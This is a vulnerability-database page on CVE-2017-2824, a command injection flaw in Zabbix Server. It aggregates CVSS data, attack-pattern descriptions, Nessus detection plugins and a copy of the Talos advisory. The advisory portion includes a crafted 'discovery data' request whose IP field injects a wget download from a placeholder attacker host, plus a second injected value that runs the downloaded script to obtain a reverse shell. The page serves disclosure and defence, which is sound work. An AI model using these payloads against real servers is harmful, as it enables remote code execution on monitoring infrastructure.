Vulnerabilities > CVE-2017-2824 - OS Command Injection vulnerability in Zabbix
Attack vector
NETWORK Attack complexity
MEDIUM Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
An exploitable code execution vulnerability exists in the trapper command functionality of Zabbix Server 2.4.X. A specially crafted set of packets can cause a command injection resulting in remote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 23 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
- Command Delimiters An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
- Exploiting Multiple Input Interpretation Layers An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
- Argument Injection An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.
- OS Command Injection In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.
Nessus
NASL family Fedora Local Security Checks NASL id FEDORA_2017-5C8A4EBCCD.NASL description - http://www.zabbix.com/rn3.0.8 - http://www.zabbix.com/rn3.0.9 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-07-17 plugin id 101639 published 2017-07-17 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101639 title Fedora 26 : zabbix (2017-5c8a4ebccd) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory FEDORA-2017-5c8a4ebccd. # include("compat.inc"); if (description) { script_id(101639); script_version("3.4"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2017-2824"); script_xref(name:"FEDORA", value:"2017-5c8a4ebccd"); script_name(english:"Fedora 26 : zabbix (2017-5c8a4ebccd)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "- http://www.zabbix.com/rn3.0.8 - http://www.zabbix.com/rn3.0.9 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bodhi.fedoraproject.org/updates/FEDORA-2017-5c8a4ebccd" ); # https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309 script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?2ca35986" ); script_set_attribute( attribute:"solution", value:"Update the affected zabbix package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:zabbix"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:26"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/24"); script_set_attribute(attribute:"patch_publication_date", value:"2017/07/07"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/17"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! preg(pattern:"^26([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 26", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC26", reference:"zabbix-3.0.9-1.fc26")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_WARNING, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "zabbix"); }NASL family Fedora Local Security Checks NASL id FEDORA_2017-63ACA509FB.NASL description - http://www.zabbix.com/rn3.0.8 - http://www.zabbix.com/rn3.0.9 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-07-03 plugin id 101181 published 2017-07-03 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101181 title Fedora 25 : zabbix (2017-63aca509fb) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-3937.NASL description Lilith Wyatt discovered two vulnerabilities in the Zabbix network monitoring system which may result in execution of arbitrary code or database writes by malicious proxies. last seen 2020-06-01 modified 2020-06-02 plugin id 102444 published 2017-08-14 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102444 title Debian DSA-3937-1 : zabbix - security update NASL family Fedora Local Security Checks NASL id FEDORA_2017-D191FB7FCE.NASL description - http://www.zabbix.com/rn3.0.8 - http://www.zabbix.com/rn3.0.9 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-07-03 plugin id 101184 published 2017-07-03 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/101184 title Fedora 24 : zabbix (2017-d191fb7fce) NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_5DF8BD95829011E793AF005056925DB4.NASL description mitre reports : An exploitable code execution vulnerability exists in the trapper command functionality of Zabbix Server 2.4.X. A specially crafted set of packets can cause a command injection resulting in remote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability. last seen 2020-06-01 modified 2020-06-02 plugin id 102530 published 2017-08-17 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102530 title FreeBSD : Zabbix -- Remote code execution (5df8bd95-8290-11e7-93af-005056925db4) NASL family CGI abuses NASL id ZABBIX_FRONTEND_3_2_5.NASL description According to its self-reported version number, the instance of Zabbix running on the remote host is 2.0.x prior to 2.0.21, 2.2.x prior to 2.2.18, 3.0.x prior to 3.0.9, or 3.2.x prior to 3.2.5. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the trapper command functionality due to improper handling of trapper packets. An unauthenticated, remote attacker can exploit this, via a specially crafted set of trapper packets, to inject arbitrary commands and execute arbitrary code. (CVE-2017-2824 / TALOS-2017-0325) - A security bypass vulnerability exists in the trapper command functionality due to improper handling of trapper packets. A man-in-the-middle (MitM) attacker can exploit this, via a specially crafted trapper packet, to bypass database security checks and write arbitrary data to the database. (CVE-2017-2825 / TALOS-2017-0326) Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 100615 published 2017-06-05 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/100615 title Zabbix 2.0.x < 2.0.21 / 2.2.x < 2.2.18 / 3.0.x < 3.0.9 / 3.2.x < 3.2.5 Multiple Vulnerabilities NASL family Misc. NASL id ZABBIX_SERVER_CVE-2017-2824.NASL description The Zabbix server running on the remote host is affected by a remote command injection vulnerability due to the failure to sanitize the input data involving an IP address that would go into the last seen 2020-06-01 modified 2020-06-02 plugin id 105042 published 2017-12-06 reporter This script is Copyright (C) 2017-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/105042 title Zabbix Server 'active checks' Command Injection
Seebug
| bulletinFamily | exploit |
| description | **Official patch earlier to fix the vulnerabilities**: the [Zabbix database write vulnerability](<https://www.seebug.org/vuldb/ssvid-93061>) The vulnerability lies within the ìTrapperî section of the Zabbix Code, this is the network service that allows the Proxies and the Server to communicate (TCP Port 10051) There are a set of API calls that the Zabbix Server exposes to the Zabbix proxy, the two that will be discussed are the ìdiscovery dataî and ìcommandî requests. Example data of these requests are shown below: `` '{"request":"command","scriptid":1,"hostid":10001}' '{"request":"discovery data","host":"zabbix-proxy.com","clock":10, "data":[{"clock":10,"drule":1,"dcheck2,"type":0,"ipî:î10. 0. 0. 1 î, "dns":"zabbix-agent.com", ìport":10050,"key":"test","status":0,"value":"test_value"}]} `` It should be noted that the ìrequestî command invokes a script located in the Zabbix database without any authentication occurring (which might be considered a bug in itself). Another pivotal aspect of the vulnerability is that by default, the Zabbix 2.4. X populates the MySQL database with 3 scripts inside of the scripts table: `` # scriptid == 1 == /bin/ping-c {HOST. CONN} 2>&1 # scriptid == 2 == /usr/bin/traceroute {HOST. CONN} 2>&1 # scriptid == 3 == sudo /usr/bin/nmap-O {HOST. CONN} 2>&1 `` The problem lies in the fact that the {HOST. CONN} field actually gets replaced by the hostís IP address during the invocation of the script. The value that replaces the {HOST. CONN} is located in the Zabbix ìinterfaceî table, and is stored as the ìIPî field as a VARCHAR(64). Thus, if an attacker can create an interface with a command injection as the IP address, and script with {HOST. CONN} is run via the ìcommandî request, the command injection will occur and a reverse shell can be gained. The difficulty lies in actually getting a valid entry into the Zabbix ìhostî table. By default, an unauthenticated attacker cannot do this, it requires a minor configuration on the part of the system administrators, specifically in regards to Zabbixís Auto-discovery feature. Zabbixís Auto-discovery and Auto-registration features allow for the configuration of the Zabbix Server to occur based on the data presented Zabbix Server the Zabbix Proxy. More specifically, if a hosts presents certain characteristics to the Zabbix Proxy, based on the configuration of the server, certain actions could be potentially taken, one of which causes the newly discovered host to get added to certain Zabbix database tables. When this occurs, a host is inserted into the ìhostsî table and also an entry into the Zabbix ìinterfaceî table will be created, with the IP address presented by the host being inserted into the IP column, without any validation of that IP address occurring. Thus, by sending a ìdiscovery dataî request to the server with a suitable host, a command injection can be inserted into the database: `` write_script_cmd = '{ "request":"discovery data", "host":"zabbix-proxy. domain. fake", "clock":148535399, "data":[{ "clock":1485353070, "drule":88, "dcheck":174, "type":0, "ip":";wget-O /tmp/s http://attacker-ip/s;#", "dns":"host28. domain. fake", "port":10050, "key":"sectest", "status":0, "value":"lnx<(^_^)>host" }]}' `` Due to the size limitation of the ëipí field of the Zabbix ìInterfaceî table, a second host was inserted into the table with another IP address. `` // The Host 2 ìipî:î;/bin/bash /tmp/s;#î `` After these two hosts were added, there was still the issue of not knowing the hostidís for the ìcommandî request, but this was easily solved by brute forcing backwards into the database since the command request would return a different response if the host actually existed or not, and once the hostidís of the injected hosts were known, they could be invoked directly, and a reverse shell could be gained. ### Mitigation By removing the three default script entries inside of the Zabbix Serverís ìZabbixî database, an attacker would be unable to actually execute code, even if they can insert the hosts with spoofed addresses into the database. This should not affect an organizations current operations, unless teh scripts are actually used. This proposed fix can either be done directly from the database (use zabbix; delete * from scripts;) or from the GUI interface (Administration -> Scripts -> Checkmarks -> ìDelete Selectedî/îGoî). ### Credit Discovered by Lilith Wyatt of the Cisco ASIG ### TIMELINE 2017-03-22 - Vendor Disclosure 2017-04-27 - Public Release |
| id | SSV:93060 |
| last seen | 2017-11-19 |
| modified | 2017-04-28 |
| published | 2017-04-28 |
| reporter | Root |
| title | Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability( CVE-2017-2824) |
Talos
| id | TALOS-2017-0325 |
| last seen | 2019-05-29 |
| published | 2017-04-27 |
| reporter | Talos Intelligence |
| source | http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0325 |
| title | Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability |